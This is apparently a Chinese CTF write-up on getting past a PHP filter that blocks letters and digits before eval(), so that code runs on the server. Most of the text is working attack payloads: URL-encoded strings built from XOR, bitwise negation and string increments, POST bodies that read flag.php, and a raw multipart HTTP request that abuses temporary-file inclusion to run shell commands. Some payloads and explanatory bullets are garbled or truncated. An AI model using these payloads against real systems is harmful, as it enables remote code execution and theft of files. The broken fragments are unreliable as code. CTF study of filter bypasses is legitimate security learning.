本文针对这道题目举例
<?php
if(!preg_match(‘/[a-z0-9]/is’,$_GET[‘shell’])) {
eval($_GET[‘shell’]);
}
其实就是对匹配字母和数字的正则进行绕过

基础概念

• 相当于对 的替换。而 则是相当于

• // 输出 "Hello World"
  

• PHP中，反引号可以直接命令执行系统命令，但是如果想要输出执行结果还需要使用 echo 等函数：
• // Linux
• // Windows
• 等同于
• // Linux
• // Windows

  PHP 5 和 PHP 7 的区别

  在 PHP 5 中，assert() 是一个函数，我们可以用 $=assert;$() 这样的形式来实现代码的动态执行。但是在 PHP 7 中，assert() 变成了一个和 eval() 一样的语言结构，不再支持上面那种调用方法。（但是好像在 PHP 7.0.12 下还能这样调用）
  PHP5中，是不支持 ($a)() 这种调用方法的，但在 PHP 7 中支持这种调用方法，因此支持这么写 (‘phpinfo’)();

构造payload

在PHP中，两个字符串执行异或操作以后，得到的还是一个字符串。
PHP5payload:?shell=$=(‘%01’^’').('%13'^'‘).(‘%13’^’').('%05'^'‘).(‘%12’^’').('%14'^'‘);$__=’‘.(‘%0D’^’]’).(‘%2F’^’`’).(‘%0E’^’]’).(‘%09’^’]’);$=$$;$($__[]);
POST: _=phpinfo();
_=show_source(“flag.php”);
_=var_dump(file(‘flag.php’));
_=readfile(‘flag.php’);
_=print_r(file(‘flag.php’));

• 取反运算payload：%24__%3D(‘%3E’%3E’%3C’)%2B(‘%3E’%3E’%3C’)%3B%24_%3D%24__%2F%24__%3B%24____%3D’’%3B%24___%3D%22%E7%9E%B0%22%3B%24____.%3D(%24___%7B%24_%7D)%3B%24___%3D%22%E5%92%8C%22%3B%24____.%3D(%24___%7B%24__%7D)%3B%24___%3D%22%E5%92%8C%22%3B%24____.%3D(%24___%7B%24__%7D)%3B%24___%3D%22%E7%9A%84%22%3B%24____.%3D(%24___%7B%24_%7D)%3B%24___%3D%22%E5%8D%8A%22%3B%24____.%3D(%24___%7B%24_%7D)%3B%24___%3D%22%E5%A7%8B%22%3B%24____.%3D(%24___%7B%24__%7D)%3B%24_____%3D_%3B%24___%3D%22%E4%BF%AF%22%3B%24_____.%3D(%24___%7B%24__%7D)%3B%24___%3D%22%E7%9E%B0%22%3B%24_____.%3D(%24___%7B%24__%7D)%3B%24___%3D%22%E6%AC%A1%22%3B%24_____.%3D(%24___%7B%24_%7D)%3B%24___%3D%22%E7%AB%99%22%3B%24_____.%3D(%24___%7B%24_%7D)%3B%24_%3D%24%24_____%3B%24____(%24_%5B%24__%5D)%3B
  POST：2=phpinfo();
  自增(php<=7.0.12)payload：
  ?shell=%24_%3D%5B%5D%3B%24_%3D%40%22%24_%22%3B%24_%3D%24_%5B’!’%3D%3D’%40’%5D%3B%24___%3D%24_%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24____%3D’_’%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24_%3D%24%24____%3B%24___(%24_%5B_%5D)%3B
  POST：_=phpinfo();
  PHP>7.0.12payload：使用异或/或/取反构造脚本即可。
  比如// (‘phpinfo’)();
  (“%0b%13%0b%12%12%18%13”^”%7b%7b%7b%7b%7c%7e%7c”)();

绕过;
PHP 短标签中的代码不需要写分号，所以我们直接把所有的 PHP 语句改成短标签形式就行了。

过滤$绕过：
PHP7
就用异或/或/取反/自增脚本即可。
PHP5
利用临时文件包含：
payload：
POST /?shell=?> HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type:multipart/form-data;boundary=——–123
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 109
———-123
Content-Disposition:form-data;name=”file”;filename=”1.txt”
!/bin/sh
ls /
———-123–

__END__

文章作者：xinZa1
文章出处：no-letter-webshell
作者签名：看透生活的本质，然后继续热爱它.
关于主题：xinZa1
版权声明：文章除特别声明外，均采用 BY-NC-SA 许可协议，转载请注明出处